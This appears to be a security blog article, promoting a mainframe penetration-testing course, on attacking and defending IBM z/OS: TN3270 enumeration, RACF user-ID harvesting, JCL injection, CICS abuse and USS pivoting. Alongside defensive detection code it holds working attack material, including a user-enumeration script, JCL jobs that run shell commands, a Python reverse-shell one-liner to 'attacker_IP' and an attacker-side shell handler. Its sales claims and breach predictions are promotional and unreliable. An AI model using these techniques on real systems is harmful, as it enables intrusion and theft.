
Introduction:
Mainframes power 90% of Fortune 500 transactions, yet fewer than 5% of security professionals have ever run a penetration test against IBM z/OS or its equivalents. With global financial systems, healthcare records, and government infrastructures relying on these legacy behemoths, the attack surface is massive—and largely unguarded due to a severe skill shortage. This article dissects the core techniques, commands, and defensive strategies taught in the only publicly available instructor-led mainframe penetration testing course, which kicks off next week for APAC time zones at an exclusive $790 rate.
Learning Objectives:
- Understand the unique architecture of mainframe subsystems (CICS, IMS, DB2) and how traditional pentesting tools fail against them.
- Execute practical TN3270 enumeration, RACF/ACF2/Top Secret privilege escalation, and JCL injection attacks.
- Build a mainframe-specific hardening checklist using native z/OS commands and third-party monitoring tools.
You Should Know:
- TN3270 Enumeration & Banner Grabbing – The Mainframe Discovery Phase
Most penetration testers start with Nmap and stop at "port 23 open". Mainframes serve their green screens over TN3270, a Telnet-based protocol that runs over ordinary TCP on port 23 (plaintext) or 992 (TLS). Nmap reaches it fine, but a generic Telnet banner grab never negotiates the 3270 terminal type, so it shows nothing useful. Here is how to discover and fingerprint mainframe services.
Step-by-step guide:
- Use Nmap's 3270-aware NSE scripts to identify IBM mainframes and capture the logon screen:
nmap -p 23,992 --script tn3270-info,tn3270-screen -sV <target_IP>
- Connect manually with an x3270-family emulator: `c3270` on Linux (or under WSL), `wc3270` on Windows. (`tn5250` is the IBM i/AS400 client and will not talk to z/OS.) The `L:` prefix selects TLS:
c3270 -port 23 <target_IP>
c3270 L:<target_IP>:992
- Once connected, capture the VTAM USSMSG banner (it often names the site, the LPAR and the applications you can reach), the LU name, and the TSO logon screen. Note which applications are reachable from the banner without a logon and whether the logon panel discloses a default logon procedure such as `IKJACCNT`.
What this does: It reveals the mainframe type, which subsystems (TSO, CICS, IMS) are reachable over this port, and misconfigurations such as banners that enumerate applications or a logon panel that leaks the procedure and account in use.
Mitigation: Do not expose plaintext TN3270 beyond the network segments that need it; serve port 992 with TLS from z/OS Communications Server and require client certificates; trim the USSMSG banner to the minimum; restrict which clients may reach which TN3270 ports and applications with the Communications Server SERVAUTH (RACF) resources and IP filtering.
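What the handshake above actually does on the wire, as an added example that is not part of the article or the course: a pure-Python TN3270 client that negotiates the options a 3270 host demands, decodes the first screen and classifies the service. It talks to a scripted fake host over a socketpair so it runs offline; the terminal type, the classic (non-TN3270E) negotiation, the absence of TLS and the use of cp037 to decode IBM-1047 text are assumptions.

```python
"""Added example (mine, not code from the article or the course): a minimal TN3270
handshake and banner grab in pure Python with a scripted fake host so it runs offline.
Assumptions: classic negotiation, no TLS, IBM-3278-2-E, cp037 standing in for IBM-1047."""
import socket
import threading

IAC, SE, EOR_CMD, SB, WILL, WONT, DO, DONT = 0xFF, 0xF0, 0xEF, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE
OPT_BINARY, OPT_TTYPE, OPT_EOR = 0, 24, 25
TTYPE_IS, TTYPE_SEND = 0, 1
TERMINAL = b"IBM-3278-2-E"
WANTED = {OPT_TTYPE, OPT_EOR, OPT_BINARY}  # what a 3270 host must negotiate


def negotiate(sock):
    """Answer the host's option requests until the first 3270 record (ended by
    IAC EOR) arrives. Returns (options the host asked for, record bytes)."""
    asked, buf, record = set(), b"", bytearray()
    while True:
        chunk = sock.recv(4096)
        if not chunk: return asked, bytes(record)
        buf += chunk
        while buf:
            if buf[0] != IAC:                        # plain 3270 data byte
                record.append(buf[0]); buf = buf[1:]; continue
            if len(buf) < 2: break
            cmd = buf[1]
            if cmd == IAC:                           # escaped 0xFF data byte
                record.append(IAC); buf = buf[2:]
            elif cmd == EOR_CMD:                     # end of the 3270 record
                return asked, bytes(record)
            elif cmd in (DO, DONT, WILL, WONT):
                if len(buf) < 3: break
                opt, buf = buf[2], buf[3:]
                if cmd == DO:                        # host wants us to enable opt
                    asked.add(opt)
                    sock.sendall(bytes([IAC, WILL if opt in WANTED else WONT, opt]))
                elif cmd == WILL:                    # host offers to enable opt
                    sock.sendall(bytes([IAC, DO if opt in WANTED else DONT, opt]))
            elif cmd == SB:                          # IAC SB <option> ... IAC SE
                end = buf.find(bytes([IAC, SE]))
                if end < 0: break
                sub, buf = buf[2:end], buf[end + 2:]
                if sub[:2] == bytes([OPT_TTYPE, TTYPE_SEND]):
                    sock.sendall(bytes([IAC, SB, OPT_TTYPE, TTYPE_IS]) + TERMINAL + bytes([IAC, SE]))
            else:                                    # NOP and other two-byte commands
                buf = buf[2:]


def screen_text(record):
    """Drop the write command, WCC and orders; decode the EBCDIC field data."""
    SBA, SF, IC, RA, SFE, MF, SA = 0x11, 0x1D, 0x13, 0x3C, 0x29, 0x2C, 0x28
    out, i = bytearray(), 2                          # skip command byte and WCC
    while i < len(record):
        b = record[i]
        if b in (SBA, SA):                           # two-byte operand
            out.append(0x40); i += 3
        elif b == SF:                                # one-byte attribute
            out.append(0x40); i += 2
        elif b in (SFE, MF):                         # count, then attribute pairs
            out.append(0x40); i += 2 + 2 * record[i + 1]
        elif b == RA:                                # address + character to repeat
            out.append(0x40); i += 4
        elif b == IC: i += 1
        else:
            out.append(0x40 if b == 0x00 else b); i += 1
    return bytes(out).decode("cp037")


def fingerprint(asked, text):
    """Classify the service from its negotiation and the applications its banner names."""
    kind = "tn3270" if WANTED <= asked else "telnet (no 3270 negotiation)"
    return kind, [a for a in ("TSO", "CICS", "IMS", "VTAM") if a in text.upper()]


def _fake_host(sock):
    """Scripted stand-in for a z/OS TN3270 host (constructed test fixture)."""
    def expect(n):
        data = b""
        while len(data) < n:
            data += sock.recv(n - len(data))
    sock.sendall(bytes([IAC, DO, OPT_TTYPE])); expect(3)            # <- WILL TTYPE
    sock.sendall(bytes([IAC, SB, OPT_TTYPE, TTYPE_SEND, IAC, SE]))
    expect(4 + len(TERMINAL) + 2)                                      # <- IS IBM-3278-2-E
    for cmd, opt in ((DO, OPT_EOR), (WILL, OPT_EOR), (DO, OPT_BINARY), (WILL, OPT_BINARY)):
        sock.sendall(bytes([IAC, cmd, opt])); expect(3)
    screen = b"\xf5\xc3\x11\x40\x40" + "WELCOME TO ZOS   ENTER TSO OR CICS".encode("cp037")
    sock.sendall(screen + bytes([IAC, EOR_CMD]))                       # Erase/Write, WCC, SBA, text


def demo():
    """Run the client against the fake host over a socketpair; returns (kind, apps, text)."""
    client, server = socket.socketpair()
    threading.Thread(target=_fake_host, args=(server,), daemon=True).start()
    client.settimeout(5.0)
    asked, record = negotiate(client)
    client.close(); server.close()
    text = screen_text(record)
    return (*fingerprint(asked, text), text)


if __name__ == "__main__":
    print(demo())  # for a real host, use socket.create_connection((host, 23)) instead of the pair
```

Against a real target you open the connection yourself, pass it to `negotiate()` and feed the record to `screen_text()`; a host that never asks for TERMINAL-TYPE, EOR and BINARY is not serving 3270 on that port, however the banner reads. The order handling in `screen_text()` is deliberately minimal: it skips orders by their fixed operand lengths so that field text survives, which is all a fingerprint needs.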
- RACF User Enumeration – Harvesting Valid User IDs from Logon Messages
RACF (Resource Access Control Facility) is the primary security manager on z/OS. Without valid credentials, an attacker can still enumerate valid user IDs because the TSO logon dialogue answers differently for an unknown ID than for a known one.
Step-by-step guide (Linux & z/OS shell):
- From a TN3270 session, reach the TSO logon prompt and enter a guessed user ID. An undefined ID is rejected straight away with IKJ56420I ("Userid ... not authorized to use TSO"), while a defined ID is taken on to the password prompt, and a wrong password or a revoked ID then produces its own messages (IKJ56421I, RACF ICH408I). That difference is the oracle.
- Automate it with Python and the `py3270` library, which drives s3270/x3270 on Linux and ws3270/wc3270 on Windows (so no AutoHotkey or PowerShell screen scraping is needed):
from py3270 import Emulator

e = Emulator(visible=False)
e.connect('target_mainframe:23')          # 'L:target_mainframe:992' for TLS
e.wait_for_field()
e.send_string('TSO')                      # application name from the VTAM banner; site-specific
e.send_enter()
e.wait_for_field()
for user in open('users.txt'):
    user = user.strip().upper()
    e.send_string(user)
    e.send_enter()
    e.wait_for_field()
    screen = '\n'.join(e.string_get(row, 1, 80) for row in range(1, 25))
    if 'IKJ56420I' not in screen:          # no "not authorized to use TSO" = the ID exists
        print(f'Valid user: {user}')
    e.send_clear()                         # back to the prompt; adjust to the site's logon flow
e.terminate()
What this does: It quickly identifies active RACF user IDs without a password, enabling targeted password spraying or social engineering. Because no password is ever sent, the probes do not count towards RACF's revoke threshold, which is why the technique is so quiet.
Mitigation: The message difference lives in TSO/E, not in RACF, so no single RACF option hides it. Reduce what the oracle is worth and make using it noisy instead: require multi-factor authentication (IBM Z Multi-Factor Authentication, which plugs into RACF user profiles) so a harvested ID plus a sprayed password is not enough; limit TN3270 to the network segments and terminals that need it; and alert on bursts of IKJ56420I and ICH408I messages in SYSLOG (see the detection section below).
- JCL Injection – From Batch Jobs to System Compromise
Job Control Language (JCL) describes batch jobs to JES. If an attacker can get JCL into the JES input stream under someone else's authority (a CICS program that writes to the internal reader, an FTP server with `SITE FILETYPE=JES` enabled, an automation tool that builds job cards from user input), the job runs with the owning user's access to every dataset, program and USS file that user can reach.
Step-by-step guide (z/OS native commands):
- Submit a simple job to list the system catalog (if the RACF JESJOBS class is active, the submitter needs authority to submit this job name):
//INJECTJB JOB (ACCT),'ATTACKER',CLASS=A,MSGCLASS=X
//STEP1    EXEC PGM=IKJEFT01
//SYSTSPRT DD SYSOUT=*
//SYSTSIN  DD *
 LISTC LEVEL(SYS1) ALL
/*
- More advanced – execute USS shell commands through BPXBATCH:
//BASHSTEP EXEC PGM=BPXBATCH,REGION=0M
//STDOUT   DD SYSOUT=*
//STDERR   DD SYSOUT=*
//STDPARM  DD *
SH id > /tmp/owned.txt; netstat -a > /tmp/netstat.out
/*
- To deliver a reverse shell, have the BPXBATCH step start a program that opens a TCP socket back to you: a custom assembler or C program, or Python if IBM Open Enterprise SDK for Python is installed in USS.
What this does: the injected job reads and writes every dataset the owning user ID can access, runs USS commands as that ID, and pivots onto the network from the mainframe. If the abused submission path runs jobs under an automation or surrogate ID with broad access, that ID's authority is what the attacker inherits.
Mitigation: activate the RACF JESJOBS class to control who may submit which job names and SURROGAT to control who may submit work under another user ID; use the JESINPUT class to restrict which input sources (readers, NJE nodes, the FTP JES interface) may submit at all; never build job cards from untrusted input; validate and monitor submitted JCL with tools such as IBM zSecure (Audit and Command Verifier).
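The mitigation above asks for JCL validation. As an added example that is not part of the article or of any IBM product, the following Python reviews a job before it goes to the internal reader and flags the two step types shown above (IKJEFT01 with a SYSTSIN, BPXBATCH with a shell STDPARM), a job card that asks to run under another user ID, and output DDs aimed at the internal reader. The sample job is constructed, and the rule set is an assumption chosen for illustration; the real control remains RACF (JESJOBS, SURROGAT, JESINPUT).

```python
"""Added example (mine, not from the article or any IBM product): a pre-submission
JCL reviewer of the kind a scheduling gateway or CI job can run before a job reaches
the internal reader. Rules are illustrative assumptions; the real control is RACF."""
import re
from dataclasses import dataclass

# Programs that turn a job into a general-purpose execution primitive.
RISKY_PROGRAMS = {"BPXBATCH", "BPXBATSL", "IKJEFT01", "IKJEFT1A", "IKJEFT1B", "AMASPZAP"}
# Patterns worth flagging inside in-stream data (SYSTSIN, STDPARM, ...).
INSTREAM_RULES = [
    (re.compile(r"^\s*SH\b", re.I), "shell-command"),    # BPXBATCH STDPARM line
    (re.compile(r"\bSUBMIT\b", re.I), "nested-submit"),  # TSO SUBMIT from SYSTSIN
    (re.compile(r"INTRDR", re.I), "internal-reader"),
]
# The operand field ends at the first blank outside quotes.
OPERANDS = re.compile(r"^((?:'[^']*'|[^\s'])*)")


@dataclass
class Finding:
    lineno: int
    rule: str
    detail: str


def parse_jcl(text):
    """Split JCL into (lineno, name, op, operands, instream) tuples, joining
    continuation lines and capturing the data that follows DD * / DD DATA."""
    lines, stmts, i = text.splitlines(), [], 0
    while i < len(lines):
        lineno, line = i + 1, lines[i]
        i += 1
        if not line.startswith("//") or line.startswith("//*"):
            continue                                   # comment, delimiter or stray data
        body = line[2:]
        if body[:1].isspace():                         # blank name field
            name, rest = "", body.strip()
        else:
            name, _, rest = body.partition(" ")
        op, _, tail = rest.strip().partition(" ")
        operands = OPERANDS.match(tail.strip()).group(1)
        while operands.endswith(",") and i < len(lines) and lines[i].startswith("// "):
            operands += OPERANDS.match(lines[i][2:].strip()).group(1)   # continuation
            i += 1
        instream = []                                  # (lineno, text) pairs
        if op == "DD" and re.match(r"(\*|DATA)(,|$)", operands):
            enders = ("/*",) if operands.startswith("DATA") else ("//", "/*")
            while i < len(lines) and not lines[i].startswith(enders):
                instream.append((i + 1, lines[i]))
                i += 1
            if i < len(lines) and lines[i].startswith("/*"):
                i += 1                                 # consume the delimiter
        stmts.append((lineno, name, op, operands, instream))
    return stmts


def review_job(text):
    """Return the findings a reviewer should see before this job is submitted."""
    findings = []
    for lineno, _name, op, operands, instream in parse_jcl(text):
        if op == "JOB" and (m := re.search(r"USER=(\w+)", operands)):
            findings.append(Finding(lineno, "surrogate", f"job asks to run as {m.group(1)}"))
        if op == "EXEC" and (m := re.search(r"PGM=(\w+)", operands)) \
                and m.group(1) in RISKY_PROGRAMS:
            findings.append(Finding(lineno, "risky-program", m.group(1)))
        if op == "DD" and "INTRDR" in operands.upper():
            findings.append(Finding(lineno, "internal-reader", operands))
        for data_lineno, data in instream:
            for pattern, rule in INSTREAM_RULES:
                if pattern.search(data):
                    findings.append(Finding(data_lineno, rule, data.strip()))
    return findings


# Constructed sample: the two injected steps from the article, a job card that asks
# to run as another user, and a step that feeds a member to the JES internal reader.
SAMPLE_JOB = """\
//ATTACKJB JOB (ACCT),'ATTACKER',CLASS=A,MSGCLASS=X,
//         USER=PRODBAT
//STEP1    EXEC PGM=IKJEFT01
//SYSTSPRT DD SYSOUT=*
//SYSTSIN  DD *
 LISTC LEVEL(SYS1) ALL
/*
//STEP2    EXEC PGM=BPXBATCH,REGION=0M
//STDPARM  DD *
SH id > /tmp/owned.txt; netstat -a > /tmp/netstat.out
/*
//STEP3    EXEC PGM=IEBGENER
//SYSUT2   DD SYSOUT=(A,INTRDR)
//SYSUT1   DD DSN=HACK.JOBS(PAYLOAD),DISP=SHR
"""

if __name__ == "__main__":
    for f in review_job(SAMPLE_JOB):
        print(f"line {f.lineno:3}: {f.rule:16} {f.detail}")
```

The parser is the interesting part: it joins continuation lines (so `USER=` on the second line of the job card is still seen), and it keeps the in-stream data attached to the DD that introduced it, which is where BPXBATCH's `SH` line and a TSO `SUBMIT` hide. A gateway that only pattern-matched `PGM=BPXBATCH` would miss a job that reaches the same effect through `IKJEFT01` and `SUBMIT` in SYSTSIN.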
- CICS Transaction Abuse – Web-Style Attacks on Green Screens
CICS (Customer Information Control System) is the online transaction processing subsystem. Many CICS transactions are exposed via TN3270 or HTTP (CICS Web Support, CICS Transaction Gateway) and suffer from the same classes of flaw as web applications: unchecked input reaching COBOL/PL/I fields, privileged "system" transactions left reachable, and authorisation enforced inside the application instead of by RACF.
Step-by-step guide:
- Sign on with `CESN` (CICS sign-on), then inventory the region with the `CEMT` master-terminal transaction:
CEMT INQUIRE PROGRAM – lists installed programs
CEMT INQUIRE TRANSACTION – lists installed transactions
- Check whether the command-level interpreter `CECI` is reachable. CECI lets a terminal user type any EXEC CICS command, including the system-programming commands, so it has no business being usable in production:
CECI INQUIRE SYSTEM – if the response is RESPONSE: NORMAL, you can issue any EXEC CICS command the region's user ID is allowed, not just INQUIRE.
- For HTTP-enabled regions, treat the endpoints as a web application: list them with `CEMT INQUIRE URIMAP`, then test the parameters each URIMAP's program consumes with standard web tooling (curl, Burp). The HTTP body is application data; a request body containing `EXEC CICS` text is not interpreted by CICS, so the injection target is the COBOL program's own input handling (field lengths, COMMAREA parsing), not the API.
What this does: a reachable CECI/CEMT, or an injectable application program, gives the attacker control of the region: reading and updating files and DB2 tables, submitting JCL to the JES internal reader with EXEC CICS SPOOLOPEN OUTPUT, or shutting the region down with CEMT PERFORM SHUTDOWN.
Mitigation: apply transaction security (RACF `TCICSTRN`/`GCICSTRN` classes, with SEC=YES and XTRAN=YES in the SIT) so that CEMT, CECI, CEDA and the other CE* transactions are limited to named administrators and removed from production regions where not needed; enforce resource security (XFCT, XPPT) rather than application-level checks; validate all user input in COBOL/PL/I programs.
- z/OS Unix System Services (USS) Pivoting – From Mainframe to Linux-Like Shell
USS is the POSIX environment that runs alongside MVS in the same system. A TSO user with an OMVS segment (a UID/GID in the RACF profile) gets a shell in which most familiar Unix tools work, can move files in with sftp/scp if OpenSSH is configured, and can reach the network from the mainframe. Two things differ from Linux and trip up tools: the shell and its files are EBCDIC (IBM-1047) by default, and identity comes from RACF, not from /etc/passwd.
Step-by-step guide:
- From TSO, start a USS shell with `OMVS` (or `ISHELL` for the ISPF-based shell).
- Once in USS, use familiar commands to enumerate:
uname -a           z/OS release and system name
id                 RACF user ID, UID/GID and groups
ls -la /           USS root filesystem
cat /etc/passwd    not used for authentication on z/OS; often missing or a stub, so rely on id and RACF LISTUSER output instead
- Escalate by searching for setuid binaries (rare on z/OS but present) and, from TSO, for user IDs permitted to the FACILITY-class profile BPX.SUPERUSER (RLIST FACILITY BPX.SUPERUSER AUTHUSER shows who holds it):
find / -perm -4000 -ls 2>/dev/null
- To maintain access, run a reverse shell (Python, if IBM Open Enterprise SDK for Python is installed):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
Expect EBCDIC on the wire: /bin/sh reads and writes IBM-1047, so the listener has to transcode (for example `iconv -f IBM-1047 -t UTF-8` on the attacker side) or the output is unreadable and your commands are misread.
What this does: USS provides a familiar attack surface (weak file permissions, world-writable directories, vulnerable setuid programs, daemons running as UID 0) that can lead to full compromise of the mainframe's Unix services and, through BPX.SUPERUSER or UID 0, of the system.
Mitigation: Implement strict RACF controls on USS resources (zFS file permissions, the FACILITY-class `BPX.SUPERUSER` profile and the other BPX.* profiles, the list of UID 0 user IDs); disable unnecessary USS daemons; forward USS process and file-system audit events (SMF types 80 and 92) to the SIEM (IBM QRadar, Splunk).
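The reverse shell works, but the bytes that arrive are EBCDIC. As an added example (mine, not from the article), here is the attacker-side handler with the transcoding built in, plus a constructed stand-in for the mainframe end so it runs offline. The IBM-1047 table is approximated from Python's cp037 codec with the code points that differ for shell syntax patched in; that table, the sentinel-based command framing and the canned responses are assumptions, and the table is worth checking against the target's own `iconv` before relying on it.

```python
"""Added example (mine, not from the article): an attacker-side handler for a z/OS
reverse shell that transcodes the IBM-1047 EBCDIC /bin/sh speaks, with a constructed
stand-in for the mainframe end. Assumption: Python's cp037 table patched where
IBM-1047 differs for shell syntax ([ ] ^ ¬) and at the z/OS newline (0x15 NL)."""
import socket
import threading


def _build_tables():
    decode = list(bytes(range(256)).decode("cp037"))
    overrides = {0xAD: "[", 0xBD: "]", 0x5F: "^", 0xB0: "¬", 0xBA: "Ý", 0xBB: "¨",
                 0x15: "\n", 0x25: "\n"}     # 0x15 is the USS line end; accept LF too
    for pos, ch in overrides.items():
        decode[pos] = ch
    encode = {ch: pos for pos, ch in enumerate(decode)}
    encode["\n"] = 0x15
    return decode, encode


DECODE, ENCODE = _build_tables()


def decode_zos(data: bytes) -> str:
    """IBM-1047 bytes from the mainframe -> text."""
    return "".join(DECODE[b] for b in data)


def encode_zos(text: str) -> bytes:
    """Text -> IBM-1047 bytes; characters with no code point become '?' (0x6F)."""
    return bytes(ENCODE.get(ch, 0x6F) for ch in text)


class ZosShellSession:
    """Run commands, one at a time, over a connected socket to a z/OS /bin/sh."""

    def __init__(self, sock, sentinel="__ZDONE__", timeout=10.0):
        self.sock, self.sentinel = sock, sentinel
        sock.settimeout(timeout)

    def run(self, command):
        """Send a command, read until the shell echoes the sentinel, return its output."""
        marker = encode_zos(self.sentinel + "\n")
        self.sock.sendall(encode_zos(f"{command}; echo {self.sentinel}\n"))
        buf = b""
        while marker not in buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                break
            buf += chunk
        return decode_zos(buf.split(marker)[0])


def _fake_zos_shell(sock):
    """Constructed stand-in for the mainframe side: reads one EBCDIC command line and
    answers in EBCDIC, using the z/OS shell's own 'not found' wording for unknowns."""
    canned = {"id": "uid=1001(PENTEST) gid=1(OMVSGRP) groups=1(OMVSGRP)",
              "ls /u/pentest": "[tools]  notes.txt"}
    data = b""
    while b"\x15" not in data:
        data += sock.recv(4096)
    line = decode_zos(data.split(b"\x15")[0])          # "cmd; echo __ZDONE__"
    cmd = line.split(";")[0].strip()
    reply = canned.get(cmd, f"{cmd}: FSUM7351 not found")
    sock.sendall(encode_zos(reply + "\n__ZDONE__\n"))


def demo(command="id"):
    """Exchange one command with the fake z/OS end over a socketpair."""
    ours, theirs = socket.socketpair()
    t = threading.Thread(target=_fake_zos_shell, args=(theirs,), daemon=True)
    t.start()
    out = ZosShellSession(ours).run(command)
    t.join(5)
    ours.close(); theirs.close()
    return out


if __name__ == "__main__":
    # Real use: bind a listener, accept the callback from the python -c one-liner,
    # then ZosShellSession(conn).run("id"). The demo needs no mainframe.
    print(demo("id"), end="")
    print(demo("ls /u/pentest"), end="")
```

Two details matter in practice: the newline must go out as 0x15 or the shell never sees the end of the line, and square brackets differ between IBM-037 and IBM-1047, so a listener that uses an unpatched cp037 table silently mangles any command containing `[`, `]` or `^`.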
- Mainframe Hardening & Detection Commands (For Blue Teams)
Defenders must know how to detect the above attacks using native z/OS tools and RACF commands.
Step-by-step guide (z/OS console and TSO):
- Check for failed logons. The TN3270 server does not know whether a logon succeeded; RACF does, and it records failures as ICH408I messages in SYSLOG and as SMF type 80 records. Unload the SMF records to a flat file with the RACF SMF data unload utility (dataset names and allocation below are placeholders) and filter the JOBINIT events whose qualifier is not SUCCESS:
//RACFUNLD EXEC PGM=IFASMFDP
//SYSPRINT DD SYSOUT=*
//ADUPRINT DD SYSOUT=*
//OUTDD    DD DSN=SEC.RACF.UNLOAD,DISP=(NEW,CATLG),SPACE=(CYL,(50,10))
//SMFDATA  DD DSN=SYS1.MAN1,DISP=SHR
//SMFOUT   DD DUMMY
//SYSIN    DD *
  INDD(SMFDATA,OPTIONS(DUMP))
  OUTDD(SMFOUT,TYPE(80:83))
  USER2(IRRADU00)
  USER3(IRRADU86)
/*
- Review the JES2 job queues for jobs from unexpected sources (the FTP JES interface, NJE, an automation ID's internal reader). From the console, or from SDSF with a leading /:
$DA                  display active jobs
$DJ'SUSPECT',LONG    full attributes of a named job
- Activate the RACF job-submission classes and log the failures:
SETROPTS CLASSACT(JESJOBS JESINPUT SURROGAT) LOGOPTIONS(FAILURES(JESJOBS JESINPUT SURROGAT))
- On Linux/Windows jump servers that connect to mainframes, capture TN3270 traffic with tcpdump (port 23 is plaintext; on port 992 you only see the TLS handshake):
sudo tcpdump -i eth0 -s 0 -w mainframe_traffic.pcap port 23 or port 992
- Run the discovery the attacker will run. Nmap ships `tso-enum`, `cics-enum`, `vtam-enum` and `lu-enum` alongside `tn3270-screen`; if they return user IDs, transactions or application names from outside the mainframe segment, so will the attacker's copy.
What this does: the unload, the queue displays and the RACF logging options turn z/OS's own records (SMF, SYSLOG, JES) into events a SOC can alert on. Mainframe attacks never touch an EDR, so this is where detection has to happen.
Mitigation: Implement a dedicated mainframe SIEM feed (e.g., IBM zSecure Audit or the IBM Security QRadar z/OS integration) so SMF and SYSLOG reach the SOC in near real time; conduct regular red team exercises using the techniques above.
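Detection logic for the logon-failure patterns described in the enumeration section, as an added example that is not the article's own code: a sliding window over SYSLOG-style lines that separates user-ID harvesting (many distinct unknown IDs), password spraying (many distinct known IDs each failing once) and brute force (one ID failing repeatedly). The sample lines are constructed, the timestamp-first line format and the thresholds are assumptions, and in production the parser would consume the IRRADU00 unload or a SYSLOG feed rather than a Python list.

```python
"""Added example (mine, not from the article): detection logic for the enumeration,
spraying and brute-force patterns, run over constructed SYSLOG-style lines. The
line format (HH:MM:SS then the message) and thresholds are assumptions; the message
wording approximates the real IKJ56420I and ICH408I texts."""
import re
from datetime import datetime, timedelta

UNKNOWN_USER = re.compile(r"IKJ56420I\s+Userid\s+(\w+)\s+not authorized to use TSO", re.I)
BAD_PASSWORD = re.compile(r"ICH408I\s+USER\((\w+)\s*\).*?INVALID PASSWORD ENTERED AT TERMINAL\s+(\w+)", re.I)
REVOKED = re.compile(r"ICH408I\s+USER\((\w+)\s*\).*?USER ACCESS REVOKED", re.I)


def parse_line(line):
    """Return (time, kind, userid, terminal) for a logon-failure message, else None."""
    stamp, _, msg = line.partition(" ")
    try:
        when = datetime.strptime(stamp, "%H:%M:%S")
    except ValueError:
        return None
    if m := UNKNOWN_USER.search(msg):
        return when, "unknown-user", m.group(1).upper(), None
    if m := BAD_PASSWORD.search(msg):
        return when, "bad-password", m.group(1).upper(), m.group(2)
    if m := REVOKED.search(msg):
        return when, "revoked", m.group(1).upper(), None
    return None


def detect(lines, window=timedelta(minutes=2), enum_threshold=10,
           spray_threshold=5, brute_threshold=5):
    """Slide a window over the failures and raise three kinds of alert:
    user-enumeration  - many distinct unknown IDs (the IKJ56420I oracle being harvested)
    password-spray    - many distinct known IDs each failing their password
    brute-force       - one known ID failing repeatedly (heading for revocation)
    Returns {alert kind: set of user IDs involved}."""
    events = sorted(filter(None, map(parse_line, lines)), key=lambda e: e[0])
    alerts = {}
    for i, (start, _, _, _) in enumerate(events):
        win = [e for e in events[i:] if e[0] - start <= window]
        unknown = {u for _, kind, u, _ in win if kind == "unknown-user"}
        failed = [u for _, kind, u, _ in win if kind != "unknown-user"]
        if len(unknown) >= enum_threshold:
            alerts.setdefault("user-enumeration", set()).update(unknown)
        if len(set(failed)) >= spray_threshold:
            alerts.setdefault("password-spray", set()).update(failed)
        for u in set(failed):
            if failed.count(u) >= brute_threshold:
                alerts.setdefault("brute-force", set()).add(u)
    return alerts


# Constructed sample log: an enumeration burst, a spray across batch IDs, one ID
# hammered until RACF revokes it, and a normal logon (ICH70001I) that must not alert.
GUESSES = ["ADMIN", "ROOT", "TEST", "GUEST", "SYSADM", "IBMUSER1",
           "OPER", "CICSUSR", "DB2ADM", "BACKUP", "ORACLE", "TSOUSER"]
SAMPLE_LOG = [f"10:42:{s:02d} IKJ56420I Userid {u} not authorized to use TSO"
              for s, u in enumerate(GUESSES)]
SAMPLE_LOG += [f"10:50:{5 * s:02d} ICH408I USER({u} ) GROUP(BATCH   ) NAME(BATCH ID) "
               f"LOGON/JOB INITIATION - INVALID PASSWORD ENTERED AT TERMINAL TCP0001{s}"
               for s, u in enumerate(["BATCH01", "BATCH02", "BATCH03", "BATCH04", "BATCH05", "BATCH06"])]
SAMPLE_LOG += [f"11:00:{4 * s:02d} ICH408I USER(OPS001  ) GROUP(OPS     ) NAME(OPS ACCOUNT) "
               "LOGON/JOB INITIATION - INVALID PASSWORD ENTERED AT TERMINAL TCP00099"
               for s in range(5)]
SAMPLE_LOG.append("11:00:25 ICH408I USER(OPS001  ) GROUP(OPS     ) NAME(OPS ACCOUNT) "
                  "LOGON/JOB INITIATION - USER ACCESS REVOKED")
SAMPLE_LOG.append("11:05:00 ICH70001I OPS002   LAST ACCESS AT 10:15:33 ON MONDAY, JANUARY 6, 2025")

if __name__ == "__main__":
    for kind, users in sorted(detect(SAMPLE_LOG).items()):
        print(f"{kind:18} {sorted(users)}")
```

The three rules deliberately key on different things. Enumeration only ever produces IKJ56420I, because the attacker never reaches the password prompt, so a brute-force rule that counts bad passwords per user sees nothing; a spray looks like unrelated users each mistyping once, so a per-user threshold is also blind to it. Counting distinct user IDs per window is what catches both, and the revoke message is a late signal that the per-user rule should already have fired on.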
What Undercode Say:
- Key Takeaway 1: Mainframe penetration testing is a zero‑competition niche – only one publicly available instructor‑led course exists, and seats are nearly gone at $790 APAC pricing.
- Key Takeaway 2: The same injection and enumeration flaws that plague web apps (JCL injection, CICS command injection) exist on mainframes, but lack of awareness makes them goldmines for attackers.
- Analysis: Over the next 18 months, we predict a wave of mainframe breaches as ransomware groups discover these attack vectors. Organizations still relying on `CECI` in production or open TN3270 ports will be the first to fall. Defenders must immediately audit RACF settings, disable unnecessary transactions, and train at least one team member in mainframe offensive security – the course mentioned here offers the fastest path. The $790 investment is negligible compared to a single hour of mainframe downtime.
Prediction:
Mainframe security will transition from “arcane knowledge” to a mandatory compliance checkbox by 2028. Regulatory bodies (PCI DSS, HIPAA, SOC2) will add mainframe-specific penetration testing requirements, driving demand for certified testers. Expect the rise of automated mainframe fuzzers and cloud-based mainframe emulators for safe training. The early adopters who take Kev Milne’s course now will command six-figure consulting fees within two years, while laggards will scramble to patch decade-old vulnerabilities exposed by the coming wave of mainframe ransomware.
Reported By: Ryan Williams – Hackers Feeds